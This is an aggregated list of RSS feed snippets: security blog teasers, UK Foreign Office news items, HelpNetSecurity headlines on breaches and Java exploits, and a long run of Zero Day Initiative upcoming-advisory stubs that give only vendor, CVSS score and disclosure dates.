http://feeds.feedburner.com/epistemeca I got in a conversation last week about the upcoming bandwidth crisis in the core. I’ve managed to forget about those issues more and more over the past few months. Ive spent a lot of time thinking about vulnerability research and social engineering lately at the expense of a lot of other security thinking. But [...]

==> Social Networking and Security

http://feeds.feedburner.com/epistemeca Lately, I’ve been thinking more and more about social networking. I was reading a recent article by Eric Ogren on this issue at Searchsecurity.com. The article said: “According to a recent Websense Inc. survey, the decision has already been made by the business units with 86% of IT respondents reporting pressure to allow more social [...]

==> Obama and Hypnosis

http://feeds.feedburner.com/epistemeca I was on the Altered Egos radio program from Nanaimo, BC this morning, and we were talking about hypnosis, NLP and influence as it relates to political speech, advertising, etc. I mentioned an awesome paper about Obama’s use of hypnotic language and patterning – the paper can be found here. In most of its moral [...]

==> NLP is not Science

http://feeds.feedburner.com/epistemeca One of the people whose work I have enjoyed of late is Gadi Evron. I find that he and I approach problems and random things very similarly (although he blogs his results far, far more frequently than I do… mine just get saved up for classes, webinars and articles). So, Gadi posted recently about his [...]

==> Six Sigma and App Security

http://feeds.feedburner.com/epistemeca From a note that Hoff tweeted, I ended up reading Jeremiah’s awesome new post in which he asked the following question: “How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate? ” I started a thread on twitter with my answer, but that’s not the [...]

==> Foreign Office website moved to GOV.UK

http://feeds.feedburner.com/FcoLatestNewsRssFeed GOV.UK The Foreign Office is publishing its news and policy on GOV.UK, the new place to find government information.

==> Minister for Europe renews UK commitment to EU enlargement

http://feeds.feedburner.com/FcoLatestNewsRssFeed Crown Copyright Minister for Europe David Lidington has set out the UK’s continued commitment to EU enlargement following his participation in the General Affairs Council meeting in Brussels on 11 December.

==> North Korean Ambassador summoned to Foreign and Commonwealth Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign & Commonwealth Office, Crown Copyright The North Korean Ambassador in London was summoned by the Permanent Under Secretary of State at the Foreign Office following news of the launch of a satellite by North Korea earlier today.

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary (crown copyright) Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague | Crown Copyright The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed Afghan tribesmen take part in celebrations for the solar-based New Year's or Nowruz. GettyImages The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012

==> Parental bleep Abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed bleep Abduction New figures reveal that the number of parental bleep abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Mark Simmonds Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Piracy Ransoms Task Force publishes recommendations

http://feeds.feedburner.com/FcoLatestNewsRssFeed Piracy Today the Piracy Ransoms Task Force presented its conclusions on how to work together to reduce the threat of piracy and ultimately ransom payments to pirates.

==> Samsung Galaxy devices' lock screen easily bypassed

http://feeds.feedburner.com/HelpNetSecurity This week revealed not one, but two security vulnerabilities that allow anyone to bypass the lock screen on a variety of Samsung Android smatphones. On Monday UK blogger Terence Eden showed how it'...

==> Google reports on non-court ordered FBI data requests

http://feeds.feedburner.com/HelpNetSecurity With every new Transparency Report that Google releases biannually since 2009, new information about data requests from government agencies are included. This last report, which spans July to Dece...

==> Malicious Java applet uses stolen certificate to run automatically

http://feeds.feedburner.com/HelpNetSecurity A signed but malicious applet that will apparently fool even the latest Java 6 update has been discovered on a German online dictionary website infected by the g01pack exploit kit, warns security rese...

==> 99 percent of web apps vulnerable to attack

http://feeds.feedburner.com/HelpNetSecurity A new Cenzic report demonstrates that the overwhelming presence of web application vulnerabilities remains a constant problem, with an astounding 99 percent of applications tested revealing security r...

==> Identity theft on the rise this tax season

http://feeds.feedburner.com/HelpNetSecurity The threat of identity theft this tax season leaves consumers with more to worry about than whether or not a tax return is in the mail. A thief may use sensitive information, such as a Social Secur...

==> Bogus Delta receipt confirmation leads to malware

http://feeds.feedburner.com/HelpNetSecurity Once again, Delta Air Lines customers are being targeted with spoofed emails supposedly carrying their eTicket, and are urged to download and open the attached PDF file purportedly containing it, or t...

==> The Chinese time bomb

http://feeds.feedburner.com/HelpNetSecurity At Seculert, when we analyze a targeted attack, we are trying to help our customers understand the intention of the attackers, as we look how the attack evolves over time. In some cases, understanding...

==> Static analysis tool for examining binaries

http://feeds.feedburner.com/HelpNetSecurity GrammaTech announced a static-analysis tool for analyzing binary libraries and executables. CodeSonar for Binaries enables users to examine software for security vulnerabilities and malicious code, wi...

==> Dell SecureWorks expands incident response services

http://feeds.feedburner.com/HelpNetSecurity Dell SecureWorks is expanding its incident response (IR) services to counter the growing severity and frequency of breaches. Many organizations arent equipped internally to plan for and respond to to...

==> Enterprise security for businesses addressing privacy obstacles

http://feeds.feedburner.com/HelpNetSecurity Protegrity announced deeper enterprise security for global businesses addressing privacy obstacles such as cross-border data transfer and industry specific regulatory compliance. Ever-changing priv...

==> Longline phishing attacks rely on mass customization

http://feeds.feedburner.com/HelpNetSecurity Proofpoint released a wide-ranging study that identified a new class of sophisticated and effective, large-scale phishing attack dubbed "longlining". Longlining, which is named after the industrial fi...

==> New exploit kit concentrates on Java flaws

http://feeds.feedburner.com/HelpNetSecurity Webroot's Dancho Danchev is known for combing through the wilds of the Internet for places where cyber criminals congregate and reporting back with interesting news about tools and services offered fo...

==> Older MiniDuke strain found, raises questions about its origins

http://feeds.feedburner.com/HelpNetSecurity A version of MiniDuke - the cyberspy malware aimed at governments and agencies in Europe and elsewhere - has been operating for at least 21 months, internet security firm Bitdefender has discovered. ...

==> Gang arrested for hacking and stealing from exchange companies

http://feeds.feedburner.com/HelpNetSecurity The Dubai police has arrested three people allegedly belonging to a crime gang that managed to steal nearly $2 million from Dubai exchange companies with the help of hackers. The hackers have broke...

==> Conflicting views on cloud security responsibility

http://feeds.feedburner.com/HelpNetSecurity CA and the Ponemon Institute released a study that shows companies have improved their practices around cloud computing security compared to a previous study from 2010. Still, the responses raise q...

==> Oracle releases emergency patch to fix exploited Java flaw

http://feeds.feedburner.com/HelpNetSecurity Oracle has released an out-of-band Java patch to fix the CVE-2013-1493 vulnerability that is currently being exploited in attacks in the wild. The security alert accompanying the release says tha...

==> Safe iOS web surfing for kids

http://feeds.feedburner.com/HelpNetSecurity Net Nanny for iOS brings safe web browsing and surfing for kids of all ages to iPod Touch, iPhone and iPad using iOS 5.0 or later. Available from the App Store for $4.99, Net Nanny for iOS is a c...

==> Open standards are key for security in the cloud

http://feeds.feedburner.com/HelpNetSecurity The current divide between proprietary and open approaches to enterprise cloud computing has implications beyond the obvious. More than just issues of cloud interoperability and data portability, open...

==> Dangerous beans: Oracle deep in the storm

http://feeds.feedburner.com/HelpNetSecurity Last week security researchers from FireEye discovered a new Java exploit that works against the latest versions of Java (version 6 update 41 and version 7 updated 15) making this a zero-day. The flaw...

==> Half of companies have lost a device with important data

http://feeds.feedburner.com/HelpNetSecurity Half of companies have lost a device with important company data on it, causing security implications for over a fifth of organizations, according to Varonis. 57% of employees believe that BYOD put...

==> VASCO launches new card reader for transaction signing and PKI applications

http://feeds.feedburner.com/HelpNetSecurity VASCO launched DIGIPASS 870, a USB connectable card reader which can be used in both connected and unconnected mode. In connected mode DIGIPASS 870 can be used for a number of PKI-based, e-banking ...

==> Auditing of Web apps with analytics dashboard for compliance

http://feeds.feedburner.com/HelpNetSecurity SaaSID has launched Cloud Application Manager 2.0 (CAM), the latest version of its browser-based authentication, management and auditing solution. CAM 2.0's audit report is now displayed in CAM A...

==> Blackhole outfitted with exploit for recently patched Java flaw

http://feeds.feedburner.com/HelpNetSecurity The exploit for the recently patched CVE-2013-0431 Java vulnerability has been added to the Blackhole exploit kit, Trend Micro researchers report. The fact was discovered through the analysis of th...

==> Safari now blocks all but latest version of Flash plugin

http://feeds.feedburner.com/HelpNetSecurity With all the Flash Player and Java zero-day vulnerabilities lately getting exploited in attacks, browser vendors are trying to come up with solutions to protect their users without antagonizing them w...

==> Kaspersky PURE 3.0 Total Security released

http://feeds.feedburner.com/HelpNetSecurity Kaspersky Lab released Kaspersky PURE 3.0 Total Security, which offers protection for users to secure their online activities and digital assets across their home network of PCs. Here are some of...

==> Warning from "Mark Zurckerberg" leads to account hijacking

http://feeds.feedburner.com/HelpNetSecurity If you get an email sent by "Mark Zurckerberg", saying your Facebook account might be permanently suspended because of violations of the social network's Terms of Service, fight the urge to follow th...

==> Jailed British hacker hacks own prison's mainframe

http://feeds.feedburner.com/HelpNetSecurity A UK cyber criminal jailed in a maximum security prison has managed to hack into the institution's mainframe after having been allowed to participate in IT lessons, the Daily Mail reports. The in...

==> Evernote breached, forces service-wide password reset

http://feeds.feedburner.com/HelpNetSecurity The popular notetaking and archiving service Evernote has notified its 50+ million users that the service's internal network has been breached by attackers and that they are forcing a password reset f...

==> Review: Wide Open Privacy: Strategies For The Digital Life

http://feeds.feedburner.com/HelpNetSecurity Authors: J.R. Smith and Siobhan MacDermott Pages: 190 Publisher: IT-Harvest Press ISBN: 0985460733 Introduction We live in a digital age where it's become normal to see people post photos...

==> Security is changing, organizations are unprepared

http://feeds.feedburner.com/HelpNetSecurity F5 Networks announced the findings of its 2013 RSA Security Trends Survey, which revealed that organizations are struggling to keep pace with the changing face of security. Respondents were RSA attend...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> ZDI-CAN-1795: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1790: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Brett Gervasoni' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1787: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1784: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1768: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1767: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1766: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1765: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1764: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1763: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1761: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1760: Hewlett-Packard, Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1759: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1752: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1749: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1745: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1744: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1741: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1731: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1730: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1729: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1624: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1623: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1622: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1621: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1743: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1742: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1735: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1734: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1692: F-Secure

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-14, 8 days ago. The vendor is given until 2013-08-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1772: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1747: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1688: Avaya

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1478: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-11, 11 days ago. The vendor is given until 2013-08-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1746: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1718: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1717: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1716: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1713: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1565: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1684: Citrix

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-01-23, 30 days ago. The vendor is given until 2013-07-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1736: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1698: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'axtaxt' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1690: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1671: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1670: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1669: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1724: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1699: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1676: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'agix' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1732: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1727: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1726: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1715: Novell

